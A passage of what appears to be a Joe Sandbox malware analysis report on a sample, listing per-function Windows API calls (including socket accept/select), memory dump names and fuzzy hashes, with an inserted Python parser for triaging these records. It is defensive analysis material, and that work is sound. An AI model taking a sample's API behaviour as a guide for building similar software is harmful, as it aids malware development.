                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLastacceptselect
                                                                                                        • String ID:
                                                                                                        • API String ID: 385091864-0
                                                                                                        • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                                                        • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                                                                                                        • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                                                        • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                                                                                                        APIs
                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend
                                                                                                        • String ID:
                                                                                                        • API String ID: 3850602802-0
                                                                                                        • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                                                        • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                                                                                        • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                                                        • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
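The function records in this part of the report (an API call list, a Memory Dump Source, the IDA Plugin snapshot and the Similarity hashes, repeated once per function) are easier to triage as structured data than as page text. The following is an added example and not Joe Sandbox's own code: a parser for that record format, an index of direct API call sites by API name, and a lookup of the Instruction Fuzzy Hashes of every function that calls into a given module (here WSOCK32, the networking code). SAMPLE is a constructed input, excerpted and shortened from three records on this page; the section headers, bullet layout and field names are those of the report. Associated lines copied from the rendered report carry the link label "Download File" fused onto the dump name, and the parser strips it. The names parse_records, index_by_api and functions_using_module are this example's own.

```python
import re
from collections import defaultdict

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
LINK_LABEL = "Download File"   # link text the web UI fuses onto Associated lines
# "• Name.MODULE(args), ref: ADDR" or "• Name.MODULE ref: ADDR", optionally
# prefixed with "Part of subcall function ADDR:" for calls made by a callee.
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$")
FIELD_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")

# Constructed sample: excerpted and shortened from three records on this page.
SAMPLE = """\
APIs
  • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
• GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
• SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: Window$Long$AttributesLayered
• String ID:
• Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
APIs
• gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
• WSAGetLastError.WSOCK32(00000000), ref: 0046D439
• _memmove.LIBCMT ref: 0046D475
• inet_ntoa.WSOCK32(?), ref: 0046D481
Similarity
• API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
• Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
APIs
• select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
• __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
• accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
• WSAGetLastError.WSOCK32(00000000), ref: 00458B03
Similarity
• API ID: ErrorLastacceptselect
• Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
"""


def parse_records(text):
    """One dict per function record: apis, strings, associated dumps, fields."""
    records, cur, section = [], None, "APIs"
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTION_HEADERS:
            section = line
            if line == "APIs":          # each "APIs" header opens a new record
                if cur is not None:
                    records.append(cur)
                cur = {"apis": [], "strings": [], "associated": [], "fields": {}}
            continue
        if cur is None:                 # text that begins mid-record
            cur = {"apis": [], "strings": [], "associated": [], "fields": {}}
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                args = m["args"].split(",") if m["args"] is not None else []
                cur["apis"].append({"name": m["name"], "module": m["module"],
                                    "args": args, "ref": m["ref"], "subcall": m["sub"]})
        elif section == "Strings":
            cur["strings"].append(line.lstrip("•").strip())
        else:                           # Memory Dump Source / IDA Plugin / Similarity
            m = FIELD_RE.match(line)
            if not m:
                continue
            key, val = m["key"].strip(), m["val"].strip()
            if key == "Associated":
                if val.endswith(LINK_LABEL):
                    val = val[:-len(LINK_LABEL)].rstrip()
                cur["associated"].append(val)
            else:
                cur["fields"][key] = val
    if cur is not None:
        records.append(cur)
    return records


def index_by_api(records):
    """API name -> call-site addresses of direct (non-subcall) calls."""
    idx = defaultdict(list)
    for r in records:
        for a in r["apis"]:
            if a["subcall"] is None:
                idx[a["name"]].append(a["ref"])
    return dict(idx)


def functions_using_module(records, module):
    """Instruction Fuzzy Hashes of functions that call `module` directly."""
    return sorted({r["fields"].get("Instruction Fuzzy Hash", "") for r in records
                   if any(a["module"] == module and a["subcall"] is None for a in r["apis"])})
```

Run it over the full report text rather than this excerpt, and pivot on the Instruction Fuzzy Hash values rather than the ref: addresses: the addresses belong to this build of the binary, while the fuzzy hashes under Similarity are the values that remain comparable against other samples' reports. "Part of subcall function" entries are kept with their callee address so they are not mistaken for calls made by the function itself.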
                                                                                                        APIs
                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                                                                                        • GetStockObject.GDI32(00000011), ref: 00430258
                                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                                                                                        • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$CreateMessageObjectSendShowStock
                                                                                                        • String ID:
                                                                                                        • API String ID: 1358664141-0
                                                                                                        • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                                                        • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                                                                                        • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                                                        • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                                                                                        APIs
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                                                                                        • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 2880819207-0
                                                                                                        • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                                                        • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                                                                                        • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                                                        • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                                                                                        APIs
                                                                                                        • GetWindowRect.USER32(?,?), ref: 00430BA2
                                                                                                        • ScreenToClient.USER32(?,?), ref: 00430BC1
                                                                                                        • ScreenToClient.USER32(?,?), ref: 00430BE2
                                                                                                        • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ClientRectScreen$InvalidateWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 357397906-0
                                                                                                        • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                                                        • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                                                                                                        • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                                                        • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                                                                                        APIs
                                                                                                        • __wsplitpath.LIBCMT ref: 0043392E
                                                                                                          • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                        • __wsplitpath.LIBCMT ref: 00433950
                                                                                                        • __wcsicoll.LIBCMT ref: 00433974
                                                                                                        • __wcsicoll.LIBCMT ref: 0043398A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                                                                        • String ID:
                                                                                                        • API String ID: 1187119602-0
                                                                                                        • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                                                        • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                                                                                                        • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                                                        • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 1597257046-0
                                                                                                        • Opcode ID: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                                                                                                        • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                                                                                                        • Opcode Fuzzy Hash: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                                                                                                        • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                                                                                                        APIs
                                                                                                        • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                                                                                                        • __malloc_crt.LIBCMT ref: 0041F5B6
                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: EnvironmentStrings$Free__malloc_crt
                                                                                                        • String ID:
                                                                                                        • API String ID: 237123855-0
                                                                                                        • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                                                        • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                                                                                                        • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                                                        • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DeleteDestroyObject$IconWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 3349847261-0
                                                                                                        • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                                                        • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                                                                                                        • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                                                        • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                                                                                                        APIs
                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                                                                                        • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                                        • String ID:
                                                                                                        • API String ID: 2223660684-0
                                                                                                        • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                                                        • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                                                                                                        • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                                                        • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
APIs
  • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
  • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
  • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
• MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
• LineTo.GDI32(?,?,?), ref: 00447326
• EndPath.GDI32(?), ref: 00447336
• StrokePath.GDI32(?), ref: 00447344
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
• String ID:
• API String ID: 2783949968-0
• Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
• Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
• Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
• Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
APIs
• SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
• GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
• GetCurrentThreadId.KERNEL32 ref: 004364A3
• AttachThreadInput.USER32(00000000), ref: 004364AA
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
• String ID:
• API String ID: 2710830443-0
• Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
• Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
• Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
• Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
APIs
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
• UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
• CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
• CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
  • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
  • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
• String ID:
• API String ID: 146765662-0
• Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
• Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
• Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
